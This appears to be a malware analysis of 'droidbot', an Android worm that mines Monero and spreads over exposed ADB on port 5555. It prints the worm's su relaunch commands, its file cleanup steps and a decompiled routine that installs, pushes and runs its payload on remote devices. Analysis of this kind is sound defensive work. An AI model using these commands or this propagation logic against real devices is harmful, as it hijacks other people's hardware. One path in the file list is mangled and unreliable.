SHA1: c4e13a96b3eb308f88b3d1e16ea65bffcfb39fb0
The main component of the worm designed to mine the Monero (XMR) cryptocurrency on an infected Android device.
To control its relaunching, droidbot executes the following command: “ps | grep droidbot”. In case the copy of droidbot has already been launched, the second process shuts down. Then application runs “/data/local/tmp/invoke.sh”, and deletes the following files:
/data/local/tmp/invoke.sh
/data/local/tmp/ddexe
/data/local//data/local/tmp/install-recovery.shtmp/debuggerd
/data/local/tmp/install-recovery.sh
Then droidbot checks whether its process has the root privileges. If not, but the “/system/bin/su” or “/system/xbin/su” utilities are located on the computer, droidbot launches its copy using su and shuts down the original process:
su -c /data/local/tmp/nohup /data/local/tmp/droidbot
/data/local/tmp/nohup /data/local/tmp/droidbotIf the process is launched with root privileges, it runs two threads: the first one tries to inject other devices, and the second one checks the “ro.product.cpu.abi” value in “/system/build.prop” in order to detect the bitness of the operating system. Depending on the result, it launches the respective version of the miner: “/data/local/tmp/xmrig64” or “/data/local/tmp/xmrig32”.
The Trojan generates a random IP address and tries to connect to the port 5555 in an infinite loop. It sends a specially generated package and checks the response. If it is successful, the Trojan tries to hack a remote device in the following way:
int __fastcall CheckAndInstall(char *szIP)
{
char *v1; // r4
signed int v2; // r5
v1 = szIP;
AdbConnect(szIP);
if ( !AdbGetState(v1) )
{
puts("[+] get devices");
v2 = AdbPsGrep(v1, "droidbot");
if ( !(AdbCat(v1, "/data/local/tmp/botsuinit_1_1.txt") | v2) )
{
puts("[+] our bin is running");
goto LABEL_5;
}
AdbRmRf(v1, "/data/local/tmp/");
AdbInstall(v1, "/data/local/tmp/droidbot.apk");
AdbAmStart(v1, "com.android.good.miner/com.example.test.MainActivity");
AdbPush(v1, "/data/local/tmp/sss", "/data/local/tmp/");
AdbPush(v1, "/data/local/tmp/nohup", "/data/local/tmp/");
AdbPush(v1, "/data/local/tmp/bot.dat", "/data/local/tmp/");
AdbChmod(v1, "/data/local/tmp/sss");
AdbChmod(v1, "/data/local/tmp/nohup");
AdbChmod(v1, "/data/local/tmp/bot.dat");
AdbShell(v1, "/data/local/tmp/nohup", "/data/local/tmp/sss");
sleep(30);
}
AdbDisconnect();
LABEL_5:
pthread_cond_signal(&unk_348EC);
return 0;
}